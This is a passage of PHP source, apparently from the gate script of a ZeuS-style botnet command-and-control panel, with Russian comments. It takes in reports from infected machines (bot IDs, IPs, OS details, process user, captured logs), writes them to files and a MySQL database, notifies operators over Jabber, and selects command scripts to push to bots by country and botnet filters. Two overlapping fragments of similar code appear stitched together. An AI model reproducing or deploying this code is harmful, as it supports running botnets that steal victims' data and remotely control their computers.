//Запись в файл. if ($config['reports_to_fs'] === 1) { if (isHackNameForPath($botId) || isHackNameForPath($botnet)) { die; } $file_path = $config['reports_path'] . '/other/' . urlencode($botnet) . '/' . urlencode($botId); if (!createDir($file_path) || !($h = fopen($file_path . '/reports.txt', 'ab'))) { die; } flock($h, LOCK_EX); fwrite($h, str_repeat("=", 80) . "\r\n" . "bot_id={$botId}\r\n" . "botnet={$botnet}\r\n" . "bot_version=" . intToVersion($botVersion) . "\r\n" . "ipv4={$realIpv4}\r\n" . "country={$country}\r\n" . "type={$type}\r\n" . "rtime=" . gmdate('H:i:s d.m.Y', $curTime) . "\r\n" . "time_system=" . (empty($list[SBCID_TIME_SYSTEM]) ? 0 : gmdate('H:i:s d.m.Y', toInt($list[SBCID_TIME_SYSTEM]))) . "\r\n" . "time_tick=" . (empty($list[SBCID_TIME_TICK]) ? 0 : tickCountToText(toUint($list[SBCID_TIME_TICK]) / 1000)) . "\r\n" . "time_localbias=" . (empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : timeBiasToText(toInt($list[SBCID_TIME_LOCALBIAS]))) . "\r\n" . "os_version=" . (empty($list[SBCID_OS_INFO]) ? '' : osDataToString($list[SBCID_OS_INFO])) . "\r\n" . "language_id=" . (empty($list[SBCID_LANGUAGE_ID]) ? 0 : toUshort($list[SBCID_LANGUAGE_ID])) . "\r\n" . "process_name=" . (empty($list[SBCID_PROCESS_NAME]) ? '' : $list[SBCID_PROCESS_NAME]) . "\r\n" . "process_user="******"\r\n" . "path_source=" . (empty($list[SBCID_PATH_SOURCE]) ? '' : $list[SBCID_PATH_SOURCE]) . "\r\n" . "context=\r\n" . $list[SBCID_BOTLOG] . "\r\n\r\n\r\n"); flock($h, LOCK_UN); fclose($h); } if ($config['reports_jn'] === 1) { imNotify($type, $list, $botId); } } } else { if (!empty($list[SBCID_NET_LATENCY])) { //Стандартный запрос. $query = "`bot_id`='{$botIdQ}', `botnet`='{$botnetQ}', `bot_version`={$botVersion}, `country`='{$countryQ}', `rtime_last`={$curTime}, " . "`net_latency`=" . (empty($list[SBCID_NET_LATENCY]) ? 0 : toUint($list[SBCID_NET_LATENCY])) . ", " . "`tcpport_s1`=" . (empty($list[SBCID_TCPPORT_S1]) ? 0 : toUshort($list[SBCID_TCPPORT_S1])) . ", " . "`time_localbias`=" . (empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : toInt($list[SBCID_TIME_LOCALBIAS])) . ", " . "`os_version`='" . (empty($list[SBCID_OS_INFO]) ? '' : addslashes($list[SBCID_OS_INFO])) . "', " . "`language_id`=" . (empty($list[SBCID_LANGUAGE_ID]) ? 0 : toUshort($list[SBCID_LANGUAGE_ID])) . ", " . "`ipv4_list`='" . (empty($list[SBCID_IPV4_ADDRESSES]) ? '' : addslashes($list[SBCID_IPV4_ADDRESSES])) . "', " . "`ipv6_list`='" . (empty($list[SBCID_IPV6_ADDRESSES]) ? '' : addslashes($list[SBCID_IPV6_ADDRESSES])) . "', " . "`ipv4`='" . addslashes(pack('N', ip2long($realIpv4))) . "'"; if (!mysqlQueryEx('botnet_list', "INSERT INTO `botnet_list` SET `comment`='', `rtime_first`={$curTime}, `rtime_online`={$curTime}, {$query} " . "ON DUPLICATE KEY UPDATE `rtime_online`=IF(`rtime_last` <= " . ($curTime - $config['botnet_timeout']) . ", {$curTime}, `rtime_online`), {$query}")) { die; } unset($query); //Поиск скриптов для отправки. $replyData = ''; $replyCount = 0; $botIdQm = toSqlSafeMask($botIdQ); $botnetQm = toSqlSafeMask($botnetQ);
$botnet_list_op = 'ERROR'; break; } unset($query); // Update country on insert if ($country == '??' && ($botnet_list_op == 'INSERT' || rand(0, 60 * 3) == 0)) { $country = ipv4toc($realIpv4); mysql_query("UPDATE `botnet_list` SET `country`='{$country}' WHERE `bot_id`='{$botIdQ}';"); } // Tell whether this bot has just appeared online $wentOnline = $botnet_list_op == 'INSERT' || (bool) mysql_result(mysql_query("SELECT `rtime_online`={$curTime} FROM `botnet_list` WHERE `bot_id`='{$botIdQ}';"), 0, 0); if ($wentOnline) { GATE_DEBUG_MODE && GateLog::get()->log(GateLog::L_TRACE, 'type.latency', 'The bot has just went online!'); } // Notify Jabber subscribers that a new bot has appeared imNotify($type, $list, $botId, $botnet_list_op == 'INSERT', $wentOnline); // mask check happens beneath the curtain //Поиск скриптов для отправки. $replyData = ''; $replyCount = 0; $botIdQm = toSqlSafeMask($botIdQ); $botnetQm = toSqlSafeMask($botnetQ); $countryQm = toSqlSafeMask($countryQ); $r = mysqlQueryEx('botnet_scripts', "SELECT `extern_id`, `script_bin`, `send_limit`, `id`, `name`, `script_text` FROM `botnet_scripts` WHERE `flag_enabled`=1 AND " . "(`countries_wl`='' OR `countries_wl` LIKE BINARY '%{$countryQm}%') AND " . "(`countries_bl` NOT LIKE BINARY '%{$countryQm}%') AND " . "(`botnets_wl`='' OR `botnets_wl` LIKE BINARY '%{$botnetQm}%') AND " . "(`botnets_bl` NOT LIKE BINARY '%{$botnetQm}%') AND " . "(`bots_wl`='' OR `bots_wl` LIKE BINARY '%{$botIdQm}%') AND " . "(`bots_bl` NOT LIKE BINARY '%{$botIdQm}%') " . "LIMIT 10"); if ($r) { while ($m = mysql_fetch_row($r)) { $eid = addslashes($m[0]); //Проверяем, не достигнут ли лимит. if ($m[2] != 0 && ($j = mysqlQueryEx('botnet_scripts_stat', "SELECT COUNT(*) FROM `botnet_scripts_stat` WHERE `type`=1 AND `extern_id`='{$eid}'")) && ($c = mysql_fetch_row($j)) && $c[0] >= $m[2]) { mysqlQueryEx('botnet_scripts', "UPDATE `botnet_scripts` SET `flag_enabled`=0 WHERE `id`={$m[3]} LIMIT 1"); continue;